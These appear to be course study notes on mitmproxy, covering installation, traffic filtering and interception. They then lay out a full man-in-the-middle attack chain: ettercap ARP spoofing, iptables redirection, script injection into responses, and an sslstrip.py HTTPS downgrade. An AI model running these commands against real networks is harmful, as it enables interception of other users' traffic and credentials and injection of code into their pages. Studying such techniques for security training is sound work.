- Used to analyze, modify, and replay packet flows
- it is a more low level program
How to install
- cd /opt
- https://github.com/mitmproxy/mitmproxy/releases
- extract to a new folder named mitmproxy
- 3 files will show up
- mitmdump - command line version of the program
- mitmproxy - main interactive command tool
- mitmweb - web interface that allows you to monitor traffic
to see the traffic flow when a user connects to a website
- cd /opt/mitmproxy
- ./mitmweb
- navigate to web url
- set firefox proxy to
- The main search box can be used to filter packets
- ie. -a .js >> this will only show you javascript files
- ie -m POST >> this will only show you post requests
- The highlight option will only highlight what we want and not filter it
How to edit and modify packets
- cd /opt/mitmproxy
- ./mitmweb
- navigate to web url
- set firefox proxy to
- The intercept option is used to tell mitmproxy to only intercept those packets
- This means that request is held by us and not allowed to flow through
- you can then use the ui to modify the response and play it
- the video added a alert(1) to the bing.com response
Another example but this time using ettercap and mitmproxy
- ettercap -Tq -M arp:remote -i wlan0 -S / /
- This command will make us the attacker the mitm
- iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8080
- This command tells out computer to redirect port 80 to port 8080 where we are running mitmproxy
- cd /opt/mitmproxy
- ./mitmweb —transparent
- When you are done
- quit mitmweb
- iptables -t nat —flush
To automate the steps tested using mitmweb
- Run ettercap
- update iptables
- ./mitmdump —transparent —modify-body :~s:””:””
- :filter:text to replace:txt that will be injected
- When you are done
- quit mitmweb
- iptables -t nat — flush
How to use Python to interact with mitmproxy
- pip install mitmproxy
- import mitmproxy
- write your python script
- ./mitmdump -s /root/test.py —transparent
The biggest issue with the techniques we learned about mitmproxy is that they will only work with http websites. They will not work with https websites **
- https data is encrypted usinf ssl
- data can not be read or modified
- sslstrip cannot be used since mitmproxy cannot work with another transparent proxy
sslstrip is used to downgrade a webpage from https to http
What is the solution?
- use a mitmproxy script to bypass https
- there is a script named sslstrip.py that will downgrade a website from https to http
How do we perform the attack on https sites?
- ettercap -Tq -M arp:remote -i wlan0 -S / /
- ./mitmdump -s /root/sslstrip.py -s /root/test.py —mode transparent
- note you can run multiple scripts at the same time
- iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8080
- When you are done
- quit ettercap
- quit mitmdump
- iptables -t nat — flush